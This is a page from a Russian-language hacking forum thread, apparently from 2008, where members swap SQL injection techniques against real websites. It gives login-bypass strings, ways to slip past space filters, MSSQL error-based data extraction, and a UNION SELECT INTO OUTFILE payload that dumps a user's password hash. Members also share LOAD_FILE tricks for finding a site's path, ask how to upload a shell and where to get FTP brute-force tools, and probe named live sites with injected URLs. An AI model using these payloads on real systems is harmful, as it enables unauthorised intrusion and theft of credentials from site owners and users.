Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,138
    Reputations:
    350
    1'or'1'='1'
    1)or(1)=(1)
    1'or'1'='1
    и т.д

    Пробелы как таковые не нужны вообще
     
  2. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Аналоги ПРОБЕЛА:
    + или %2B
     
  3. Ghost0ff

    Ghost0ff New Member

    Joined:
    18 Nov 2008
    Messages:
    28
    Likes Received:
    4
    Reputations:
    0
    хм. +, либо еще /**/ бывает прокатывает
     
    1 person likes this.
  4. SHS

    SHS Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    53
    Likes Received:
    2
    Reputations:
    1
    Если инъекция в пост запросе, ты плюсы ставишь? На сколько я заметил, там плюc канает за плюс и тд :) то есть:
    1' or 1=(select user)+char(0x7e) выдаст : 'dbo~'

    На недельке как налажу регексы планирую выложить свой софт для mssql инъекций.
     
    #3984 SHS, 5 Dec 2008
    Last edited: 5 Dec 2008
  5. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Почему-то не получается. так и так пробовал.
    http://www.nuovemozioni.com/login.asp
     
  6. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    192
    Likes Received:
    675
    Reputations:
    333
    ник') or 1=1--(пробел)
     
  7. masternet

    masternet Elder - Старейшина

    Joined:
    18 May 2008
    Messages:
    67
    Likes Received:
    43
    Reputations:
    0
    может не в тему чуток..но всё таки..чем напарсить линки для брута фтп?
    да и Брутусае2 залейте...а то удалил его..
     
  8. geforse

    geforse Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    623
    Likes Received:
    290
    Reputations:
    1
    Где можно почитать про заливку шелла через SQL Inj ?
    конкретно про это не нашёл подходящих статей(
     
  9. SHS

    SHS Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    53
    Likes Received:
    2
    Reputations:
    1
    Login: ' or 1=(@@version)--
    Pwd: qwerty

    exec et_CustomerLOGIN 'CE2381685624496CAE568A1C9FF9F951', '' or 1=(@@version)--', 'qwery'

    Microsoft OLE DB Provider for SQL Server error '80040e14'

    Incorrect syntax near the keyword 'or'.

    Вот часть запроса выудил. Как можно сформировать запрос чтоб получить результат?
     
  10. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    SHS попробуй войти вод админом )

     
  11. InvisibleSM

    InvisibleSM Banned

    Joined:
    3 Dec 2008
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    столкнулся с проблемой, делаю union select into outfile '1.txt' оно его сохраняет в папку var/db/mysql/ но это на уровень выше чем то где находится сам сайт, короче вот так http://aaa.ru/1.txt на него не зайдеш он где то ближе лежит, вопрос как узнать где лежит сайт? там можно без полного пути, начиная с var/
     
    #3991 InvisibleSM, 5 Dec 2008
    Last edited: 5 Dec 2008
  12. desTiny

    desTiny Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    1,005
    Likes Received:
    444
    Reputations:
    94
    InvisibleSM,
    а) иногда помогает LOAD_FILE('/') - оно выведет листинг корня и т.п.
    б) почитать конфиги апача в стандартных местах
     
  13. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    а)Если только фряха если я не ошибаюсь...
    насчёт б согласен..можно ещё поискать на сайте раскрытие путей....ну или погуглить этот сайт на ошибки ...насчтё конфигов вот темка
    https://forum.antichat.ru/showthread.php?t=49775
     
  14. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    546
    Likes Received:
    284
    Reputations:
    -56
    InvisibleSM, Прорекламирую мою тулзу тебе в помощь =\

    https://forum.antichat.ru/thread79411.html
     
  15. AHMED HASSAN

    AHMED HASSAN New Member

    Joined:
    25 Apr 2007
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    hi

    sorry for english

    is this hackable

    http://forums.microsoft.com/SamVaad/ShowPost.aspx?siteid=43&PostID=4186769

    waitting>>>>>>>>>>>
     
  16. BanQui

    BanQui Elder - Старейшина

    Joined:
    10 Jul 2008
    Messages:
    68
    Likes Received:
    18
    Reputations:
    -11
    http://forums.microsoft.com/SamVaad/ShowPost.aspx?siteid=43'&PostID=4186769 hmmmm
    it may well be that filtration ' ! Not good!!!

    -------------------------------------------
    No man!!!it cannot be said : this unhackable! Search some different ways!!!
     
    #3996 BanQui, 5 Dec 2008
    Last edited: 5 Dec 2008
  17. InvisibleSM

    InvisibleSM Banned

    Joined:
    3 Dec 2008
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    блин забыл самое главное написать, там нет выводимых полей там бага в мейл поле при регистрации поэтому только аут файл могу сделать

    во что пишу

    ' union select passhash from users where id=1 into outfile '/tmp/1.txt'/* -- @bla.ua

    а прочитать терь как, хз

    на ошибки гуглил, нету
     
    #3997 InvisibleSM, 6 Dec 2008
    Last edited: 6 Dec 2008
  18. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
     
  19. zenon2

    zenon2 New Member

    Joined:
    25 Oct 2006
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Народ помогите разобрать что то непонимаю что к чему http://www.viper-shop.dk/category.php?id=180'

    Ругается что не правильный синтаксис и все тут. Уже все перепробовал. В чем ошибка?
     
  20. o314um

    o314um Member

    Joined:
    16 Nov 2006
    Messages:
    227
    Likes Received:
    89
    Reputations:
    7
    http://www.viper-shop.dk/category.php?id=180+and+1=1

    интересно что же ты перепробовал... Не знаешь - не лезь или учись...
     
Loading...
Thread Status:
Not open for further replies.